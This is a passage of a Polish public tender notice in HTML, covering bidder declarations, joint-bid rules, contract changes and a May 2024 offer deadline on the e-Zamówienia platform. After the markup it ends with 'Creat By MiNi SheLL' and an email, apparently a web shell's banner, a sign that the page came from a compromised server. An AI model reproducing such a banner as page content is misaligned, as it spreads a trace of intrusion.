postępowaniu: <span class="normal">Każdy z Wykonawców ma obowiązek złożyć wraz z ofertą: <br/>1)	oświadczenie dotyczące przesłanek wykluczenia oraz spełnianiu warunków udziału w postępowaniu na dzień składania ofert (załącznik nr 3 do SWZ), <br/>2)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z którego wynika, które działania wykonają poszczególni Wykonawcy – jeżeli dotyczy (załącznik nr 4 do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia razem z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy załączyć do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby udzielające pełnomocnictwa lub - w przypadku, gdy pełnomocnictwo zostało sporządzone, jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem - jako cyfrowe odwzorowanie tego dokumentu, opatrzone podpisem zaufanym lub podpisem osobistym przez osoby udzielające pełnomocnictwa lub kwalifikowanym podpisem elektronicznym notariusza, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postacie elektronicznej. <br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców: <br/>1)	oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale IX ust. 1 pkt 1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, <br/>2)	jeżeli dotyczy - oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które działania wykonają poszczególni Wykonawcy, o którym mowa w rozdziale IX ust. 1 pkt 2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, <br/>3)	Wykonawcy wspólnie ubiegający się o udzielnie zamówienia zobowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w rozdziale IX ust. 3 SWZ, przy czym podmiotowe środki, o których mowa:<br/>a.	w roz. IX ust. 3 pkt. 2, 3, SWZ składa Wykonawca/ Wykonawcy, który wykazuje spełnienie warunku,<br/>b.	w roz. IX ust. 3 pkt 1 składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.	Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, jako najkorzystniejsza, Zamawiający przed zawarciem umowy w sprawie zamówienia publicznego może zażądać umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w zakresie wskazanym w Załączniku Nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki Oferty/wnioski dostępnej na platformie e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com